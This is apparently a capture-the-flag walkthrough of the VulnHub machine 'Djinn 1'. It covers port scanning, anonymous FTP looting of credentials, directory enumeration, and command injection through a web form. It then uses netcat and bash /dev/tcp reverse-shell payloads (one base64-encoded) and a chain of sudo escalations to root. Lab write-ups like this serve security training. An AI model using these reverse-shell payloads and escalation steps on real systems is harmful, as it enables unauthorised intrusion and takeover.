Djinn_1-(VULNHUB)

Report Link: https://download.vulnhub.com/djinn/djinn.ova

root@kali:~/Downloads# nmap -A 192.168.135.133
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-01 08:46 GMT
Nmap scan report for 192.168.135.133
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r–r– 1 0 0 11 Oct 20 23:54 creds.txt
| -rw-r–r– 1 0 0 128 Oct 21 00:23 game.txt
|_-rw-r–r– 1 0 0 113 Oct 21 00:23 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.135.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 – secure, fast, stable
|_End of status
22/tcp filtered ssh
MAC Address: 00:0C:29:0A:82:9C (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.135.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.12 seconds

root@kali:~/Downloads# ftp 192.168.135.133
Connected to 192.168.135.133.
220 (vsFTPd 3.0.3)
Name (192.168.135.133:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r–r– 1 0 0 11 Oct 20 23:54 creds.txt
-rw-r–r– 1 0 0 128 Oct 21 00:23 game.txt
-rw-r–r– 1 0 0 113 Oct 21 00:23 message.txt
226 Directory send OK.

ftp> get creds.txt
local: creds.txt remote: creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for creds.txt (11 bytes).
226 Transfer complete.
11 bytes received in 0.00 secs (5.9316 kB/s)

ftp> get game.txt
local: game.txt remote: game.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.txt (128 bytes).
226 Transfer complete.
128 bytes received in 0.00 secs (420.8754 kB/s)

ftp> get message.txt
local: message.txt remote: message.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for message.txt (113 bytes).
226 Transfer complete.
113 bytes received in 0.00 secs (422.8029 kB/s)

root@kali:~/Downloads# cat creds.txt
nitu:81299

root@kali:~/Downloads# cat game.txt
oh and I forgot to tell you I’ve setup a game for you on port 1337. See if you can reach to the
final level and get the prize.

root@kali:~/Downloads# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don’t mess up anything.

root@kali:~/Downloads# nc 192.168.135.133 1337
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | ‘_ ` _ \ / _ \ | | | | ‘_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|

Let’s see how good you are with simple maths
Answer my questions 1000 times and I’ll give you your gift.
(6, ‘+’, 9)
> 15
(8, ‘*’, 6)
> 48
(6, ‘+’, 5)
> 11
(8, ‘/’, 5)
> 1
(5, ‘/’, 7)
> .7
(2, ‘*’, 9)
> 18
(6, ‘*’, 2)

on browser

http://192.168.135.133:7331/

now on another terminal

root@kali:~/Downloads# gobuster dir -u http://192.168.135.133:7331 -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.135.133:7331
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/12/01 08:54:14 Starting gobuster
===============================================================
/genie (Status: 200)
/wish (Status: 200)
===============================================================
2019/12/01 08:54:31 Finished
===============================================================

on browser

http://192.168.135.133:7331/genie

http://192.168.135.133:7331/wish

execute : id

we get

output : uid=33(www-data) gid=33(www-data) groups=33(www-data)

on terminal

root@kali:~/Downloads# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

Execute on browser

execute : nc -e /bin/sh 192.168.135.128 1234

click on submit

and we are not getting the shell

now try

bash -i >& /dev/tcp/192.168.135.128/1234 0>&1 encode in base64

now try

execute : echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNS4xMjgvODA4MCAwPiYx

click submit

we get the shell

www-data@djinn:/opt/80$ whoami

www-data@djinn:/opt/80$ ls

www-data@djinn:/opt/80$ cat app.py

www-data@djinn:/opt/80$ cd /home

www-data@djinn:/home$ cd nitish/.dev/

www-data@djinn:/home/nitish/.dev$ bash

python -c ‘import pty;pty.spawn(“/bin/sh”)’

$ su nitish
password : p4ssw0rdStr3t0n9

nitish@djinn:~/.dev$ whoami

nitish@djinn:~/.dev$ sudo -l

nitish@djinn:~/.dev$ genie

nitish@djinn:~/.dev$ genie -h

nitish@djinn:~/.dev$ sudo -u sam genie -cmd new

$ whoami

$ bash

sam@djinn:~/.dev$ sudo -l

sam@djinn:~/.dev$ sudo -u root /root/lago

Enter your choice : 2

Enter your num,ber : num

# whoami

# bash

root@djinn:~/dev# su root

root@djinn:/home/nitish/.dev# cd

root@djinn:~# ls

root@djinn:~# ./proof.sh

@SAKSHAM DIXIT